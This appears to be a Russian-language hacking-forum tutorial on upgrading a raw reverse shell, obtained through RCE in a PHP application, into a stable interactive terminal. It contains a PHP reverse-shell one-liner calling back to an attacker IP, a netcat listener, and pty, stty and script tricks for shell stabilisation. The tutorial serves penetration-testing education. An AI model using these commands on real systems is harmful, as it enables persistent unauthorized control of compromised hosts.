Получаем стабильный shell

megaDED

Сержант
Модератор
Сообщения
34
Реакции
5
Давайте представим, что мы получили бэк-коннект в результате эксплуатации RCE-уязвимости в условном PHP-приложении. Но едва ли это соединение можно назвать полноценным. Сегодня разберемся в том, как прокачать полученный доступ и сделать его более стабильным.


Итак, мы получили initial shell. Кто знает, как это по-русски? «Изначальная оболочка» или «первичный доступ» — ГОСТ’а нет, поэтому прошу в комментарии. Так вот, мы не сможем использовать это соединение для успешного pivoting'a, поскольку тот же SSH нам не доступен.

image

Безуспешная попытка использования SSH

Система сообщает нам, что не может справиться с SSH без полноценного терминального shell’a. Что делать в этом случае? Отправляемся в Google и находим подборки команд, не все из которых нам помогут, например:

Bash:
/bin/sh -i
image

Попытка создания псевдотерминала через /bin/sh

Что мы можем с этим сделать? Как получить стабильный шелл? Сейчас разберемся.

Зачем нам терминал в нашем соединении?

Давным-давно, во второй половине 20 века, компьютеры были большими, а взаимодействие пользователей с ними происходило посредством физических устройств, называемых телепринтерами и телетайпами. Нам важно понимать, что сейчас Linux все так же считает себя мейнфреймом, а общение с системой происходит по виртуальным терминалам.

Часто во время тестирования на проникновение мы получаем оболочку, в которой нет виртуального терминала. Большинство привычных нам бэк-коннектов представляют собой не что иное, как открытие сетевого сокета и перенаправление потоков ввода/вывода в данный сокет. При этом на хосте атакующего отсутствует такая сущность, как терминал (tty). Отсутствие терминала в соединении не дает системе корректно работать с вводом/выводом, поскольку не весь вывод можно корректно вывести через сетевой сокет на хост атакующего. Тот же пример с SSH: запрос на доверие сертификату приходит в терминал атакуемого хоста, но не доходит по сокету на хост атакующего. Команда ниже использована для имитации эксплуатации RCE-уязвимости.

Bash:
php -r '$sock=fsockopen("172.16.236.128",443);exec("/bin/sh -i <&3 >&3 2>&3");'
image

Попытка воспользоваться SSH через nc-соединение

image

Запрос на доверие сертификату выводится на атакуемом хосте

image

На стороне атакующего терминала пока нет

Прокачиваем наш изначальный шелл

Мы можем использовать Python, чтобы выйти в bash, при этом получив в свое распоряжение терминал. Команда tty показывает адрес текущего терминала.

Bash:
python3 -c 'import pty;pty.spawn("/bin/bash")'
image

Создание виртуального терминала в Python

На этом этапе нам уже доступен некий интерактив в виде возможности дать ответ на запросы системы из серии «доверяйте данному ключу SSH» или «введите пароль, чтобы воспользоваться sudo».

Это уже что-то, однако у нас все еще нет возможности воспользоваться нашим любимым сочетанием клавиш ctrl+c (пентестерский софт ведь никогда не отличался хорошей стабильностью). Чтобы получить более стабильную версию shell’a и не пересоздавать соединение по 10 раз, рекомендую использовать следующий прием.

Bash:
nc -nlvp 443
#ctrl + z
stty raw -echo && fg


Команда stty устанавливает свойства терминальной линии. Этот инструмент позволит нам сообщить терминалу на стороне атакующего, что наш ввод нужно просто направлять в stdin без обработки. Таким образом, мы больше не убьём сессию, если машинально нажмем ctrl+c.

image

Получение стабильного shell'a с помощью настройки свойств терминала

Бывает, что в системе просто не установлен Python. Что же делать в этом случае? Можно воспользоваться утилитой script, например, в CentOS она доступна по умолчанию.

Bash:
/usr/bin/script -qc /bin/bash /dev/null
image

Создание виртуального терминала в script

Думаю, этого достаточно для понимания процесса создания стабильных и удобных соединений.